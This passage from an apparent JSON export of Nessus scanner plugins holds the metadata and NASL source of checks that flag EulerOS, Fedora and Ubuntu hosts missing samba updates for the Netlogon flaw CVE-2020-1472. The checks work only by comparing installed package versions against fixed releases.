value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.11.6-6.h8.eulerosv2r9\",\n \"libwbclient-4.11.6-6.h8.eulerosv2r9\",\n \"samba-4.11.6-6.h8.eulerosv2r9\",\n \"samba-client-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-tools-4.11.6-6.h8.eulerosv2r9\",\n \"samba-libs-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-clients-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-modules-4.11.6-6.h8.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:28", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-09T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2171)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2171.NASL", "href": "https://www.tenable.com/plugins/nessus/141328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141328);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2171)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2171\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5afe159e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.11.6-6.h8.eulerosv2r9\",\n \"libwbclient-4.11.6-6.h8.eulerosv2r9\",\n \"samba-4.11.6-6.h8.eulerosv2r9\",\n \"samba-client-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-tools-4.11.6-6.h8.eulerosv2r9\",\n \"samba-libs-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-clients-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-modules-4.11.6-6.h8.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:36", "description": "Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-05T00:00:00", "type": "nessus", "title": "Fedora 31 : 2:samba (2020-a1d139381a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:31", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2020-A1D139381A.NASL", "href": "https://www.tenable.com/plugins/nessus/141144", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-a1d139381a.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141144);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-a1d139381a\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Fedora 31 : 2:samba (2020-a1d139381a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-a1d139381a\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"samba-4.11.13-0.fc31\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:27", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-4510-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-09-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Samba vulnerability (USN-4510-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:ctdb", "p-cpe:/a:canonical:ubuntu_linux:libnss-winbind", "p-cpe:/a:canonical:ubuntu_linux:libpam-winbind", "p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient0", "p-cpe:/a:canonical:ubuntu_linux:python-samba", "p-cpe:/a:canonical:ubuntu_linux:registry-tools", "p-cpe:/a:canonical:ubuntu_linux:samba", "p-cpe:/a:canonical:ubuntu_linux:samba-common", "p-cpe:/a:canonical:ubuntu_linux:samba-common-bin", "p-cpe:/a:canonical:ubuntu_linux:samba-dev", "p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules", "p-cpe:/a:canonical:ubuntu_linux:samba-libs", "p-cpe:/a:canonical:ubuntu_linux:samba-testsuite", "p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules", "p-cpe:/a:canonical:ubuntu_linux:smbclient", "p-cpe:/a:canonical:ubuntu_linux:winbind"], "id": "UBUNTU_USN-4510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140640", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4510-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140640);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"USN\", value:\"4510-1\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Samba vulnerability (USN-4510-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by a vulnerability as referenced\nin the USN-4510-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4510-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnss-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:registry-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:smbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:winbind\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'ctdb', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'python-samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-common', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'smbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '18.04', 'pkgname': 'ctdb', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libpam-winbind', 